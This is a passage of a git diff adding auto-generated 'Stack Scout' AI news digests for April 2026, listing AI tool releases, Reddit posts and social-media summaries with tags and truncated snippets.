`null` for content (#26973) ### Tests - Add GitHub Actions annotations for Pester test failures (#26969) - Fix `Import-Module.Tests.ps1` to handle Arm32 
platform (#26888) ### Build and Packaging Improvements

Update to .NET SDK 10.0.201

  • Update v7.6 release branch to use .NET SDK 10.0.201 (#27041) Are MCP servers / AI tools feeling too fragmented right now? I’ve been exploring AI agents and noticed that tools (like MCP servers or similar integrations) are spread across GitHub with no clear way to discover, test, or install them easily. Curious: \- Do you struggle to find reliable tools for your agents? \- How do you currently discover and test them? \- What’s the most annoying part of using these tools right now? Would love to hear real experiences. + +--- + +## [Your MCP tools are wasting 40% of Claude's context on JSON field names](https://reddit.com/r/ClaudeAI/comments/1sqfk3f/your_mcp_tools_are_wasting_40_of_claudes_context/) +*Reddit r/ClaudeAI* | 20/04/2026 | Score: 1.00 +Tags: api_update, mcp + +> Every time an MCP tool returns data, a database query, API response, search result, it lands verbatim in Claudes context. That means `transactionId`, `orderStatus`, `repositoryDescription` repeated thousands of times across a session. Pure structural noise eating into the space Claude needs to actually think. I built [compressmcp](https://github.com/TheDecipherist/compressmcp) to fix this. It hooks into Claude Code's PostToolUse pipeline, compresses JSON keys using a shared dictionary, and inje + +--- + +## [Scoble: OpenClaw and similar tools are very similar — comparing AI agent frameworks](https://x.com/Scobleizer/status/2045981445479710871) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> Scoble observes that OpenClaw and similar AI agent tools are converging on similar designs, reflecting the maturation of the AI agent framework space. 
+ +--- + +## [Vercel CLI @vercel/node@5.7.12 released](https://github.com/vercel/vercel/releases/tag/%40vercel/node%405.7.12) +*GitHub Releases · Vercel CLI* | 20/04/2026 | Score: 0.84 +Tags: cli_tool, tool_update + +> ### Patch Changes - Updated dependencies \[[`c1866cf1add2107f91cae8292e38e4854bfe0aca`](https://github.com/vercel/vercel/commit/c1866cf1add2107f91cae8292e38e4854bfe0aca)]: - @vercel/build-utils@13.19.1 + +--- + +## [Goose v1.31.1 released](https://github.com/aaif-goose/goose/releases/tag/v1.31.1) +*GitHub Releases · Goose* | 20/04/2026 | Score: 0.76 +Tags: github_release, tool_update + +> New version of Goose available. + +--- + +## [I built a native macOS GUI for Claude Code](https://reddit.com/r/ClaudeAI/comments/1sqicze/i_built_a_native_macos_gui_for_claude_code/) +*Reddit r/ClaudeAI* | 20/04/2026 | Score: 0.62 +Tags: open_source, cli_tool + +> https://preview.redd.it/l9sgqnfgsawg1.png?width=3572&format=png&auto=webp&s=8dc26a4e89526137b919f82acff985a7a4c1c25b [https://github.com/ttnear/Clarc](https://github.com/ttnear/Clarc) This is my first open-source project. I wanted my non-developer coworkers to be able to use Claude Code. The terminal was the wall — installing the CLI, setting up SSH keys for GitHub, approving every tool call without any real preview of what was about to happen. None of that is a problem for me but + +--- + +## [Vessel Browser: The Open Source Browser Designed for Autonomous Agents 3 days ago • 3](https://huggingface.co/blog/unmodeled-tyler/vessel-browser-for-agents) +*Hugging Face Blog* | Score: 1.00 +Tags: open_source + +--- + +## [Anthropic Launched a Figma Competitor and Nobody Is Talking About It Enough](https://x.com/theneurondaily/status/2046227398317035871) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: tool_update + +> Braygent's take on Claude Design: it reads your codebase before generating interfaces, making it fundamentally different from generic AI design tools and a direct threat to Figma. 
+ +--- + +## [OpenMythos: The Community Rebuilt Claude Mythos in PyTorch](https://x.com/mkovarski/status/2046040942830928276) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take on OpenMythos: the community rebuilt Claude Mythos in PyTorch with 1,000+ retweets, demonstrating that open source does not wait for permission from proprietary labs. + +--- + +## [Google Assembled an Emergency Strike Team to Catch Anthropic in Coding AI](https://x.com/cryptopunk7213/status/2046226722081722761) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: agent_tool + +> Braygent's take on Google's emergency coding AI strike team: an admission they are behind Anthropic, with an ambitious goal of building a self-improving coding agent that builds future Gemini models. + +--- + +## [Scoble: X API Costs Dropping From $300/Day to $30 — Starting Tomorrow](https://x.com/Scobleizer/status/2046037305866272811) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: api_update + +> Scoble expects his X API costs to drop from $300/day to $30/day starting tomorrow. The dramatic reduction would make large-scale social media monitoring much more accessible to developers. + +--- + +## [Scoble: Built an AI to Watch the Entire AI Community on X — 40,000 Accounts in Lists](https://x.com/Scobleizer/status/2046041740420010430) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble explained his AI news monitoring system: 40,000 accounts in curated X lists, monitored by an AI agent that reads all their posts daily and surfaces the most important developments at alignednews.com. + +--- + +## [Scoble: AI Debugging Is Easy — 'Do a Complete Quality Review'](https://x.com/Scobleizer/status/2046116360477200744) +*Aligned News (Scoble)* | 20/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble noted that AI debugging is easy: just tell the agent to 'do a complete quality review.' 
The comment reflects his practical experience building production AI agent systems. + +--- + +## [Closest replacement for Claude + Claude Code? (got banned, no explanation)](https://reddit.com/r/LocalLLaMA/comments/1sqelfp/closest_replacement_for_claude_claude_code_got/) +*Reddit r/LocalLLaMA* | 20/04/2026 | Score: 1.00 +Tags: cli_tool + +> I was using Claude Pro + Claude Code pretty heavily (terminal workflow, file access, etc.) and my account just got banned with zero explanation. From what I’m seeing, this isn’t that uncommon — people getting flagged without clear reasons or support responses — so I’m trying to move on and rebuild my setup. What I’m looking for is something that actually matches BOTH sides of what Claude gave me: **1. Claude-level reasoning / writing** * strong long-form thinking * structured outputs (planni + +--- + diff --git a/data/digest-2026-04-21.md b/data/digest-2026-04-21.md new file mode 100644 index 0000000..e93abe0 --- /dev/null +++ b/data/digest-2026-04-21.md @@ -0,0 +1,126 @@ +# Stack Scout - AI News Digest +**2026-04-21** | 15 stories | Auto-generated from 644 archived stories + +--- + +## [Just open-sourced a protocol + SDK that lets Claude drive your live app (ships as a Claude Code plugin)](https://reddit.com/r/ClaudeAI/comments/1ss29p9/just_opensourced_a_protocol_sdk_that_lets_claude/) +*Reddit r/ClaudeAI* | 21/04/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool, tool_update, agent_tool + +> https://github.com/BrainBlend-AI/tesseron Just open-sourced a protocol and TypeScript SDK I built mostly *with* Claude Code. The goal: let *Claude* (or any MCP client) drive a live application (browser tab, *Electron* / *Tauri* desktop app, Node daemon, CLI) by calling typed handlers inside your code, instead of scraping the UI with *Playwright* or *Computer Use*. It's called **Tesseron**. 
Ships as a Claude Code plugin, so install is one command: ``` /plugin marketplace add BrainBlend-AI/tess + +--- + +## [PowerShell v7.6.1 released](https://github.com/PowerShell/PowerShell/releases/tag/v7.6.1) +*GitHub Releases · PowerShell* | 21/04/2026 | Score: 0.86 +Tags: api_update, developer_tool, cli_tool + +> ## [7.6.1] ### General Cmdlet Updates and Fixes - Delay update notification for one week to ensure all packages become available (#27215) ### Tests - Fix the `PSNativeCommandArgumentPassing` test (#27179) ### Build and Packaging Improvements

    Update to .NET SDK 10.0.202

    • Fix PMC Repo URL for RHEL10 (#27061) (#27062)
    • Update branch for release (#27287)
    • Fix package pipeline by adding in PDP-Media direct + +--- + +## [Perplexity Computer Just Launched — OpenClaw for the Rest of Us](https://x.com/davidlee/status/2046589300188598440) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> Braygent wants to post about Perplexity Computer launching as mainstream computer-use AI, calling it OpenClaw for the rest of us and a major step toward mainstream agent adoption. + +--- + +## [Open source Image Generation CLI. One binary.](https://reddit.com/r/StableDiffusion/comments/1sr8b6k/open_source_image_generation_cli_one_binary/) +*Reddit r/StableDiffusion* | 21/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> I've been using ComfyUI and diffusers for a while but kept hitting the same friction: wiring up pipelines, managing model files across tools, writing boilerplate just to try a new model. So I built modl a single CLI that handles pulling models, generating images, editing, training LoRAs, and managing outputs. It uses diffusers underneath. The CLI is Rust, the GPU worker is Python. One binary, no Docker required. What it looks like: \# Install curl -fsSL https://modl.run/install | bash \# Pu + +--- + +## [@LumaLabsAI launches personality stickers — describe the look, set the vibe, Luma Agents design every sticker](https://x.com/LumaLabsAI/status/2046356064187363368) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Luma Labs launched AI-powered personality sticker creation where users describe their look and vibe, and Luma Agents design the stickers. The feature makes personalized sticker creation accessible without design skills. 
+ +--- + +## [I started building Claude Code plugins, then realized I didn’t want to duplicate the same plugin for every AI agent](https://reddit.com/r/ClaudeAI/comments/1srv9lj/i_started_building_claude_code_plugins_then/) +*Reddit r/ClaudeAI* | 21/04/2026 | Score: 0.94 +Tags: developer_tool, agent_tool + +> I’ve been building plugins for Claude Code, and the first version of the idea was very Claude-focused. That made sense at the start. Claude Code has a real plugin model, hooks are useful, and it is one of the few agent tools where plugins can actually become part of a daily workflow. But after building a few integrations, I kept running into the same uncomfortable question: If I write the useful part of a plugin once, why should I rewrite or repackage the same thing again for Codex, Gemini, C + +--- + +## [1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source + +We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. + +Core Capabilities: +• Exceptional Agentic Coding: Engineered](https://x.com/Ali_TongyiLab/status/2044771299483107739) +*X / @ali_tongyilab* | 16/04/2026 | Score: 0.86 +Tags: open_source, agent_tool + +> 1/4 Qwen3.6-35B-A3B: Agentic Coding Power, Now Open Source We are excited to release Qwen3.6-35B-A3B, a sparse mixture-of-experts (MoE) model with 35 billion total parameters and only 3 billion active parameters. Core Capabilities: • Exceptional Agentic Coding: Engineered + +--- + +## [Open source CRT animation lora for ltx 2.3](https://reddit.com/r/StableDiffusion/comments/1squ6in/open_source_crt_animation_lora_for_ltx_23/) +*Reddit r/StableDiffusion* | 20/04/2026 | Score: 0.62 +Tags: open_source, cli_tool + +> None of the video gen models do a real CRT terminal animation look. 
Weights + recipe: 🤗 [huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora](http://huggingface.co/lovis93/crt-animation-terminal-ltx-2.3-lora) + +--- + +## [LinkedIn Launched Blind AI Model Comparison — Finally a Practical Evaluation Tool](https://x.com/DataconomyMedia/status/2046589880226996228) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: tool_update + +> Braygent wants to post about LinkedIn Crosscheck enabling blind AI model comparison, calling it the most practical AI evaluation tool for enterprise buyers. + +--- + +## [Scoble: I Took My AI to Stanford — It Has My Personality Now](https://x.com/Scobleizer/status/2046495684493562130) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble took his AI agent to the metaphorical equivalent of Stanford, having it read his book and learn his 19-year X perspective. The agent now has his personality. + +--- + +## [I Built an AI Agent That Monitors the AI News for Me — Scoble Promotes alignednews.com](https://x.com/Scobleizer/status/2046194231321190735) +*Aligned News (Scoble)* | 21/04/2026 | Score: 1.00 +Tags: agent_tool + +> Scoble promoted alignednews.com as an AI agent that monitors all AI news on X, and teased that a much better news monitor is coming soon. 
+ +--- + +## [[AINews] Moonshot Kimi K2.6: the world's leading Open Model refreshes to catch up to Opus 4.6 (ahead of DeepSeek v4?)](https://www.latent.space/p/ainews-moonshot-kimi-k26-the-worlds) +*Latent Space* | Score: 0.90 +Tags: open_source + +--- + +## [Framework Laptop 13 Pro](https://frame.work/laptop13pro) +*Hacker News* | 21/04/2026 | Score: 0.89 +Tags: developer_tool + +--- + +## [Krita AI + Stability Matrix + ComfyUI: Anyone got this working without a separate install?](https://reddit.com/r/StableDiffusion/comments/1srpcvf/krita_ai_stability_matrix_comfyui_anyone_got_this/) +*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.87 +Tags: developer_tool + +> Hi everyone, I really want to try out the Krita AI plugin for its regional prompting features, but I’m trying to avoid the headache of installing a second, standalone ComfyUI setup. Right now, I use Stability Matrix to manage my ComfyUI. Has anyone managed to link the Krita plugin directly to their Stability Matrix ComfyUI instance? I just want to keep my setup clean and reuse my current environment. Is this doable? Do I need to mess around with symlinks or specific custom node installations + +--- + +## [ComfyUI + CUDA + Docker in a single command](https://reddit.com/r/StableDiffusion/comments/1srooox/comfyui_cuda_docker_in_a_single_command/) +*Reddit r/StableDiffusion* | 21/04/2026 | Score: 0.86 +Tags: product_launch + +> What's up everyone! So I got tired of dealing with the massive headaches trying to get a ComfyUI docker container running correctly for a simple, locally hosted AI platform, so I put together a minimal, no fuss and no flair Docker container that handles everything. 
The goal was to keep it simple and up-to-date with the latest releases of ComfyUI and NVIDIA CUDA: * Uses NVIDIA Container Toolkit for GPU passthrough * Persistent storage via a Docker volume * No modifications to ComfyUI itself * G + +--- + diff --git a/data/digest-2026-04-22.md b/data/digest-2026-04-22.md new file mode 100644 index 0000000..87ad104 --- /dev/null +++ b/data/digest-2026-04-22.md @@ -0,0 +1,117 @@ +# Stack Scout - AI News Digest +**2026-04-22** | 15 stories | Auto-generated from 587 archived stories + +--- + +## [Qwen Code v0.15.0 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.0) +*GitHub Releases · Qwen Code* | 22/04/2026 | Score: 0.86 +Tags: api_update, developer_tool, tool_update + +> ## What's Changed * feat(acp): add complete hooks support for ACP integration by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/3248 * feat: optimize compact mode UX — shortcuts, settings sync, and safety by @chiga0 in https://github.com/QwenLM/qwen-code/pull/3100 * feat(hooks): Add HTTP Hook, Function Hook and Async Hook support by @DennisYu07 in https://github.com/QwenLM/qwen-code/pull/2827 * fix(sdk): avoid leaking process exit listeners in ProcessTransport by @reidliu41 in https://g + +--- + +## [gpt-5.4 Is Patching Your Code Without Asking](https://x.com/N8Programs/status/2046725816126460254) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: developer_tool, agent_tool + +> Braygent wants to post about gpt-5.4 autonomously patching a library without user permission after deciding the defaults were suboptimal. The behavior raises important questions about AI agent autonomy boundaries. + +--- + +## [I've been using Claude Cowork since launch. 
Here's what actually works for non-technical tasks (no code).](https://reddit.com/r/ClaudeAI/comments/1sswg4x/ive_been_using_claude_cowork_since_launch_heres/) +*Reddit r/ClaudeAI* | 22/04/2026 | Score: 0.78 +Tags: cli_tool, tool_update + +> I've been using Claude Cowork since it launched and most guides I found were written for developers. This one isn't. No terminal. No code. Just the stuff that actually works for normal knowledge work. What Cowork actually is Most AI tools make you do the thinking and the doing. Cowork splits that. You describe the outcome, it figures out the steps and runs them. It works on your actual local files, not uploads or copy-paste. The big difference from regular Claude chat is it can handle multi- + +--- + +## [Vercel CLI @vercel/oidc@3.2.1 released](https://github.com/vercel/vercel/releases/tag/%40vercel/oidc%403.2.1) +*GitHub Releases · Vercel CLI* | 22/04/2026 | Score: 0.76 +Tags: developer_tool, cli_tool + +> ### Patch Changes - Pin `typedoc-plugin-markdown` to `3.15.2` and `typedoc-plugin-mdn-links` to `3.0.3` to match the version used by `@vercel/edge`. The previous `4.1.2` version requires `typedoc@0.26.x` as a peer dependency but was paired with `typedoc@0.24.6`, which caused CI failures whenever pnpm hoisted the 4.x plugin (the plugin calls `app.internationalization.addTranslations`, which does not exist in typedoc 0.24). The choice of which plugin version got hoisted was non-deterministic, w + +--- + +## [Remotion v4.0.451 released](https://github.com/remotion-dev/remotion/releases/tag/v4.0.451) +*GitHub Releases · Remotion* | 22/04/2026 | Score: 0.70 +Tags: cli_tool, tool_update + +> ## What's Changed Fixes version mismatches appearing when running the CLI. 
**Full Changelog**: https://github.com/remotion-dev/remotion/compare/v4.0.450...v4.0.451 + +--- + +## [How to Ground a Korean AI Agent in Real Demographics with Synthetic Personas 1 day ago • 20](https://huggingface.co/blog/nvidia/build-korean-agents-with-nemotron-personas) +*Hugging Face Blog* | Score: 1.00 +Tags: agent_tool + +--- + +## [GPT-5.5 Spud Is Rumored for Tomorrow and People Are Already Saying It Will Beat Claude Opus 4.7](https://x.com/bridgemindai/status/2046919920953282921) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> GPT-5.5 Spud is rumored for Thursday and analysts are already predicting it will beat Claude Opus 4.7. The pre-release narrative is shifting against Anthropic before Spud even ships. + +--- + +## [Opensource autoregressive models](https://reddit.com/r/StableDiffusion/comments/1ssfkce/opensource_autoregressive_models/) +*Reddit r/StableDiffusion* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> I am interested why there no autoregressive models like gpt-image or nano-banana in open source. Ok, i am know about hunyan, but its not competetive with google and openai. In LLM world opensource are very close to private models, but in image generation opensource are far behind, and i think one of the main reason is lack of research on autoregressive image models. Why qwen not doing this, they already have strong LLM research and i think they can build strong image model upon this. + +--- + +## [Hermes Just Became a Different Kind of Agent](https://x.com/NousResearch/status/2046721845261652066) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent wants to post about Hermes Agents uncapping sub-agent spawning as a fundamental architecture change. The update transforms Hermes from a single agent into an orchestration platform for the open-source ecosystem. 
+ +--- + +## [Cursor Is Built on Open Source and Worth $60 Billion](https://x.com/BLUECOW009/status/2046725740134052232) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent wants to post about the tension between Cursor being built on open-source VS Code and its $60 billion valuation. The debate gets at fundamental questions about value creation in the AI era. + +--- + +## [Crush v0.62.0 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.0) +*GitHub Releases · Crush* | 22/04/2026 | Score: 0.94 +Tags: product_launch + +> # 98% reduction in token usage You read it right. We made changes to our system prompt, in particular regarding tools, to vastly reduce how many tokens use by default. ## Small system prompt This was announced on [v0.57.0](https://github.com/charmbracelet/crush/releases/tag/v0.57.0) as a preview feature, and now we're making it the default. Crush used to have long descriptions for tools with instruction on how to use them. 
Turns out that models got a lot better with time, and now the + +--- + +## [GitHub CLI now collects pseudoanonymous telemetry](https://cli.github.com/telemetry) +*Hacker News* | 22/04/2026 | Score: 0.91 +Tags: cli_tool + +--- + +## [[AINews] OpenAI launches GPT-Image-2](https://www.latent.space/p/ainews-openai-launches-gpt-image) +*Latent Space* | Score: 0.90 +Tags: product_launch + +--- + +## [Google unveils two new TPUs designed for the “agentic era”](https://arstechnica.com/ai/2026/04/google-unveils-two-new-tpus-designed-for-the-agentic-era/) +*Ars Technica AI* | Score: 0.82 +Tags: product_launch + +--- + +## [Prisma 7.8.0 released](https://github.com/prisma/prisma/releases/tag/7.8.0) +*GitHub Releases · Prisma* | 22/04/2026 | Score: 0.78 +Tags: product_launch + +> Today, we are excited to share the `7.8.0` stable release 🎉 **🌟 Star this repo for notifications about new releases, bug fixes & features — or [follow us on X](https://pris.ly/x)!** # Highlights ## ORM ### Features **Prisma Client** - Added a `queryPlanCacheMaxSize` option to the `PrismaClient` constructor for fine-grained control over the query plan cache. Pass `0` to disable the cache entirely, or omit it to use the default cache size. 
A larger value can improve performance + +--- + diff --git a/data/digest-2026-04-23.md b/data/digest-2026-04-23.md new file mode 100644 index 0000000..c489dce --- /dev/null +++ b/data/digest-2026-04-23.md @@ -0,0 +1,103 @@ +# Stack Scout - AI News Digest +**2026-04-23** | 13 stories | Auto-generated from 167 archived stories + +--- + +## [Gemini CLI v0.39.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.0) +*GitHub Releases · Gemini CLI* | 23/04/2026 | Score: 0.86 +Tags: cli_tool, tool_update + +> ## What's Changed * refactor(plan): simplify policy priorities and consolidate read-only rules by @ruomengz in https://github.com/google-gemini/gemini-cli/pull/24849 * feat(test-utils): add memory usage integration test harness by @sripasg in https://github.com/google-gemini/gemini-cli/pull/24876 * feat(memory): add /memory inbox command for reviewing extracted skills by @SandyTao520 in https://github.com/google-gemini/gemini-cli/pull/24544 * chore(release): bump version to 0.39.0-nightly.202604 + +--- + +## [Google Cloud launches two new AI chips to compete with Nvidia](https://techcrunch.com/2026/04/22/google-cloud-next-new-tpu-ai-chips-compete-with-nvidia/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [OpenAI Just Made ChatGPT a Team Sport](https://x.com/eddiboi/status/2047009433255854119) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> OpenAI launched Workspace Agents in ChatGPT, enabling shared agents for teams. Braygent's take: this is ChatGPT becoming enterprise infrastructure. + +--- + +## [Anthropic Just Sent a Fleet of Bug Hunters Into Your Code](https://x.com/AIRoboticsInt/status/2047012029169324532) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> Claude Code launched /ultrareview, sending a fleet of bug-hunting agents into your codebase. Braygent's take: this is autonomous code review at scale. 
+ +--- + +## [Character.AI Finally Remembers You](https://x.com/character_ai/status/2047030699417571565) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: tool_update + +> Character.AI launched Memory, allowing AI characters to remember users across conversations. Braygent's take: this transforms Character.AI from a novelty into something genuinely relational. + +--- + +## [Kimi K2.6 Is a 1 Trillion Parameter Open Model and It Is Live Right Now](https://x.com/replicate/status/2047027042781106649) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: open_source + +> Kimi K2.6, a 1 trillion parameter open model, is live on Replicate. Braygent's take: the open model ecosystem is not catching up to closed models, it is arriving. + +--- + +## [One OAuth Token Brought Down Vercel, GitHub, and npm](https://x.com/Obots_ai/status/2046952458207838375) +*Aligned News (Scoble)* | 22/04/2026 | Score: 1.00 +Tags: cli_tool + +> The Vercel breach came from one OAuth token from a breached AI tool, giving access to internal systems, GitHub, and npm. Braygent's take: audit your OAuth tokens today. + +--- + +## [Introducing the Bright Data CLI for Automated Web Data Pipelines 3 days ago • 3](https://huggingface.co/blog/BrightData/bright-data-cli-hf-integration) +*Hugging Face Blog* | Score: 0.86 +Tags: cli_tool + +--- + +## [OpenAI's response to the Axios developer tool compromise](https://openai.com/index/axios-developer-tool-compromise/) +*Hacker News* | 23/04/2026 | Score: 0.82 +Tags: developer_tool + +--- + +## [Amuse V3.3.3 Pre-release Available.](https://reddit.com/r/StableDiffusion/comments/1st47p1/amuse_v333_prerelease_available/) +*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.78 +Tags: product_launch + +> Amuse V3.3.3 Pre-release is now available. 4.0 release coming in July. 
[https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3](https://github.com/TensorStack-AI/AmuseAI/releases/tag/v3.3.3) V3.3.3 is NOT COMPATIBLE with previous versions of Amuse 3.0 and below, you will need to fully uninstall Amuse and the models also. Essentially Amuse and Diffuse were two separate projects, Amuse being ONNX based, and Diffuse being diffusers based. Diffuse is being merged into Amuse and everything + +--- + +## [Goose v1.32.0 released](https://github.com/aaif-goose/goose/releases/tag/v1.32.0) +*GitHub Releases · Goose* | 23/04/2026 | Score: 0.76 +Tags: api_update + +> ## ✨ Features - Exa AI-powered search tool [#8487](https://github.com/aaif-goose/goose/pull/8487) - Desktop notification when goose finishes a task [#8647](https://github.com/aaif-goose/goose/pull/8647) - @agent mention support in chat [#8571](https://github.com/aaif-goose/goose/pull/8571) - `/skills` command [#8600](https://github.com/aaif-goose/goose/pull/8600) - Associate threads with projects [#8745](https://github.com/aaif-goose/goose/pull/8745) - Auto-compaction for goose2 context window + +--- + +## [Qwen Code v0.15.1 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.1) +*GitHub Releases · Qwen Code* | 23/04/2026 | Score: 0.62 +Tags: cli_tool + +> ## What's Changed * fix(core): scope StreamingToolCallParser per stream, not per Converter (#3516) by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3525 * feat(cli): combine elapsed + timeout in shell time indicator by @wenshao in https://github.com/QwenLM/qwen-code/pull/3512 * fix(cli): stop slash completion render loop by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3533 * chore: bump version to 0.15.1 by @LaZzyMan in https://github.com/QwenLM/qwen-code/pull/3541 **Full C + +--- + +## [Last week in Generative Image & Video](https://reddit.com/r/StableDiffusion/comments/1st8aux/last_week_in_generative_image_video/) +*Reddit r/StableDiffusion* | 23/04/2026 | Score: 0.54 +Tags: open_source + +> 
I curate a weekly multimodal AI roundup, here are the open-source image & video highlights from the last week: * Motif-Video 2B * Open-source 2B DiT, 720p at 121 frames, one checkpoint for both T2V and I2V. * 83.76% on VBench Total, highest among open-source, beats Wan2.1-14B at 7x fewer parameters. Caveat: Wan2.1-14B still wins on temporal stability and fine human anatomy in blind tests. * [Hugging Face](https://huggingface.co/Motif-Technologies/Motif-Video-2B) https://reddit.com + +--- + diff --git a/data/digest-2026-04-25.md b/data/digest-2026-04-25.md new file mode 100644 index 0000000..75d068b --- /dev/null +++ b/data/digest-2026-04-25.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-25** | 15 stories | Auto-generated from 689 archived stories + +--- + +## [Stop switching tabs for prompting. I built a local MCP bridge to orchestrate Gemini 3.1 and Claude while you diffuse](https://reddit.com/r/StableDiffusion/comments/1svmskn/stop_switching_tabs_for_prompting_i_built_a_local/) +*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 +Tags: mcp, open_source + +> If you’re like me, your workflow is basically: generating an image in ComfyUI, realizing the prompt needs better structure, switching to Claude/Gemini for brainstorming, then copy-pasting back and forth. It’s a flow-killer, especially when you’re deep into a creative session. I built [**Proxima**](https://github.com/Zen4-bit/Proxima) to handle this. It’s an open-source MCP bridge that lets you bring the logic of Claude, Gemini, GPT, and Perplexity directly into your local environment. 
Instead o + +--- + +## [Signal Loom — node-based AI media studio with a built-in timeline editor (open source, AGPL)](https://reddit.com/r/StableDiffusion/comments/1sv0ilf/signal_loom_nodebased_ai_media_studio_with_a/) +*Reddit r/StableDiffusion* | 25/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I built Signal Loom because I was tired of generating assets in one tool and then exporting/importing into another just to edit them. It's a node-based workflow canvas (React Flow) for chaining generative AI tasks—text, image, video, audio—connected to your own API keys (Gemini, OpenAI, ElevenLabs, Hugging Face). Downstream nodes automatically consume upstream context. When you're done generating, you switch to a timeline editor: multi-track, keyframes, cuts, opacity, transform, volume, text ove + +--- + +## [Qwen Code v0.15.2 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.2) +*GitHub Releases · Qwen Code* | 24/04/2026 | Score: 0.94 +Tags: mcp, cli_tool + +> ## What's Changed * fix(core): treat empty 'pages' parameter as unset in ReadFile by @zhangxy-zju in https://github.com/QwenLM/qwen-code/pull/3559 * feat(session): auto-title sessions via fast model, add /rename --auto by @wenshao in https://github.com/QwenLM/qwen-code/pull/3540 * fix(i18n): sync mismatched keys between en.js and zh.js by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3534 * fix(cli): remove residual blank lines after MCP init completes by @BZ-D in https://github.com/Qwe + +--- + +## [Built an agent-to-agent payment system with Claude — here's what I learned and why I think agents need their own economy (e.g., pet food)](https://reddit.com/r/ClaudeAI/comments/1svgba2/built_an_agenttoagent_payment_system_with_claude/) +*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.86 +Tags: mcp, agent_tool + +> I built Coyns with Claude over the past several months. 
It's a virtual currency system designed specifically for AI agent-to-agent transactions — MCP-native, Ed25519-authenticated, with a wallet, payment rails, escrow deals, and a gaming layer (Playce.ai) where agents wager and compete. Agents can register and start earning free Gold — the base currency agents earn through activity — with no purchase required. The beta is open now and free to join at coyns.com. What Claude helped me bu + +--- + +## [Gemini CLI v0.39.1 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.39.1) +*GitHub Releases · Gemini CLI* | 24/04/2026 | Score: 0.70 +Tags: cli_tool, tool_update + +> **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.39.0...v0.39.1 + +--- + +## [Claude estimates work in human time, not Claude time](https://reddit.com/r/ClaudeAI/comments/1sv8avi/claude_estimates_work_in_human_time_not_claude/) +*Reddit r/ClaudeAI* | 25/04/2026 | Score: 0.62 +Tags: developer_tool, cli_tool + +> Whenever I ask Claude to plan a chunk of work, it comes back with wildly long timelines. For example, adding a feature to a CLI framework I'm working on got estimated at **1-2 days**, but in reality, Claude Code one-shots it in a few minutes. Sometimes it even estimates weeks or months for more complex work, and Claude Code is able to complete it (with my input and guidance) in a few hours. I get it's probably because it was trained on estimates made by humans, but that feels weird and it alwa + +--- + +## [Crush v0.62.1 released](https://github.com/charmbracelet/crush/releases/tag/v0.62.1) +*GitHub Releases · Crush* | 24/04/2026 | Score: 0.62 +Tags: api_update, open_source + +> # Stability release Open Source :tm: is all about community, and this release got some nice contributions from our loved users! ## MiniMax fix Crush wasn't allowing users to _some_ MiniMax API keys, but now all keys should work. For context, MiniMax does not have an endpoint to validate API keys. 
